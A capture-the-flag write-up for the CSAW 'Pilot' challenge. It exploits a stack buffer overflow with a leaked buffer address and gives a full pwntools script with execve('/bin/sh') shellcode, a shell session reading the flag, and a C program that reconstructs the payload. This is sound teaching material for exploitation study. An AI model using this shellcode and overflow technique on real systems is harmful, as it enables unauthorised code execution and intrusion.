[Pwn] CSAW - Pilot


pilot

Can I take your order?

nc pwn.chal.csaw.io 8464

16:05 Eastern: Updated binary

Simple buffer overflow: the program reads up to 0x40 bytes into a stack buffer, and the binary has no protections at all (no canary, NX disabled, no PIE), so this is a very easy one. It even prints the address of the buffer for us, so we know exactly where to jump!

The plan is:

1 - Calculate the offset from the start of the buffer to the saved return address.
2 - Extract the leaked address of the buffer.
3 - Put a few NOPs at the beginning, then the shellcode, and fill the rest of the buffer up to the return address with 'A' (or any other filler).
4 - Overwrite the return address with the address of the beginning of the buffer.

Visual representation of the stack!

How the stack looks in gdb (after sending the payload):

pwndbg> x/20g 0x7ffef1913660
0x7ffef1913660: 0xbf48f63190909090 0xff978cd091969dd1
0x7ffef1913670: 0x573b04e6f7dff748 0x41414141050f5f54
0x7ffef1913680: 0x4141414141414141 0x00007ffef1913660

The offset is 40 bytes: the buffer starts at 0x7ffef1913660 and the saved return address sits at 0x7ffef1913688 (the last qword in the dump, already overwritten with the buffer address). The exploit code is very simple:

from pwn import *

local = False
binary = ELF('pwn/pilot')

def getConn():
    return process('pwn/pilot') if local else remote('pwn.chal.csaw.io', 8464)

r = getConn()
#gdb.attach(r, '''
#break *0x0000000000400b35
#c''')
r.recvuntil(b'[*]Good Luck Pilot!....\n')

# 24-byte execve("/bin/sh", NULL, NULL) shellcode
shellcode = b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
nops = b'\x90' * 4
# 40 bytes from the start of the buffer to the saved return address
padding = b'A' * (40 - len(nops) - len(shellcode))

# the binary prints the buffer address right after the banner
BUFFER = int(r.recvline()[12:], 0)
log.info("LEAKED BUFFER 0x%x" % BUFFER)

r.recvuntil(b'[*]Command:')
# nop sled + shellcode + filler, then return into the start of the buffer
r.sendline(nops + shellcode + padding + p64(BUFFER))
r.interactive()
r.close()

Running it

$ python pilot.py
[*] '~/ctf/csaw/pwn/pilot'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[+] Opening connection to pwn.chal.csaw.io on port 8464: Done
[*] LEAKED BUFFER 0x7ffc2562d050
[*] Switching to interactive mode
$ ls
flag
pilot
$ cat flag
flag{1nput_c00rd1nat3s_Strap_y0urse1v3s_1n_b0ys}
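To make the arithmetic behind the gdb dump and the exploit script explicit, here is an added C example (not part of the original writeup, and not the challenge's own code). It rebuilds the same payload the Python script sends, derives the 40-byte offset from the two addresses visible in the dump, checks that the payload's qwords match what gdb printed, and decodes the movabs immediate in the shellcode to show why the string "/bin/sh" appears nowhere in the raw bytes. The addresses are the ones from the dump; the function names (rip_offset, build_payload, qword_at, decode_binsh) are made up for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses taken from the gdb dump in the writeup: the buffer starts at
 * 0x7ffef1913660 and the qword at 0x7ffef1913688 is the saved return
 * address (it already holds the buffer address after the overflow). */
#define BUF_ADDR       0x7ffef1913660ULL
#define SAVED_RIP_ADDR 0x7ffef1913688ULL
#define READ_SIZE      0x40   /* the program reads at most 0x40 bytes */

/* The 24-byte execve("/bin/sh", NULL, NULL) shellcode used by the exploit. */
static const uint8_t shellcode[24] = {
    0x31, 0xf6,                               /* xor  esi, esi                  */
    0x48, 0xbf, 0xd1, 0x9d, 0x96, 0x91,
                0xd0, 0x8c, 0x97, 0xff,       /* movabs rdi, 0xff978cd091969dd1 */
    0x48, 0xf7, 0xdf,                         /* neg  rdi  -> "/bin/sh\0"       */
    0xf7, 0xe6,                               /* mul  esi  -> rax = rdx = 0     */
    0x04, 0x3b,                               /* add  al, 0x3b (SYS_execve)     */
    0x57,                                     /* push rdi  (string onto stack)  */
    0x54,                                     /* push rsp                       */
    0x5f,                                     /* pop  rdi  -> rdi = &"/bin/sh"  */
    0x0f, 0x05,                               /* syscall                        */
};

/* Distance from the start of the buffer to the saved return address. */
static size_t rip_offset(uint64_t buf_addr, uint64_t saved_rip_addr)
{
    return (size_t)(saved_rip_addr - buf_addr);
}

/* Little-endian 64-bit pack, the same thing pwntools' p64() does. */
static void p64(uint8_t *out, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

/* Read the qword at `off` the way gdb's x/g prints it (little-endian). */
static uint64_t qword_at(const uint8_t *p, size_t off)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[off + i];
    return v;
}

/* Fill `out` with nops | shellcode | 'A' filler | return address.
 * Returns the payload length, or 0 if the layout does not fit: either the
 * sled plus shellcode is longer than the offset, or the payload would
 * exceed what the program reads (READ_SIZE) or the output buffer. */
static size_t build_payload(uint8_t *out, size_t out_len, uint64_t buf_addr,
                            size_t offset, size_t nops)
{
    size_t total = offset + 8;
    if (total > READ_SIZE || total > out_len || nops + sizeof shellcode > offset)
        return 0;
    memset(out, 0x90, nops);
    memcpy(out + nops, shellcode, sizeof shellcode);
    memset(out + nops + sizeof shellcode, 'A', offset - nops - sizeof shellcode);
    p64(out + offset, buf_addr);   /* return into the nop sled at the buffer start */
    return total;
}

/* The movabs immediate is the negated string, so the raw shellcode contains
 * no NUL byte; `neg rdi` recovers it at run time. Writes the 8 decoded bytes
 * plus a terminator into out[9]. */
static void decode_binsh(char out[9])
{
    uint64_t imm = qword_at(shellcode, 4);   /* bytes 4..11 of the shellcode */
    p64((uint8_t *)out, (uint64_t)0 - imm);  /* two's-complement negate */
    out[8] = '\0';
}

int main(void)
{
    uint8_t payload[READ_SIZE];
    char s[9];
    size_t off = rip_offset(BUF_ADDR, SAVED_RIP_ADDR);
    size_t n = build_payload(payload, sizeof payload, BUF_ADDR, off, 4);

    printf("offset = %zu, payload = %zu bytes\n", off, n);
    for (size_t i = 0; i < n; i += 8)
        printf("0x%016llx: 0x%016llx\n", (unsigned long long)(BUF_ADDR + i),
               (unsigned long long)qword_at(payload, i));
    decode_binsh(s);
    printf("movabs immediate decodes to \"%s\"\n", s);
    return 0;
}
```

Compile with `gcc -std=c99 pilot_payload.c` and compare the printed qwords with the `x/20g` output above; they line up qword for qword, which is the quickest way to confirm that an offset calculation is right before sending anything to the remote service.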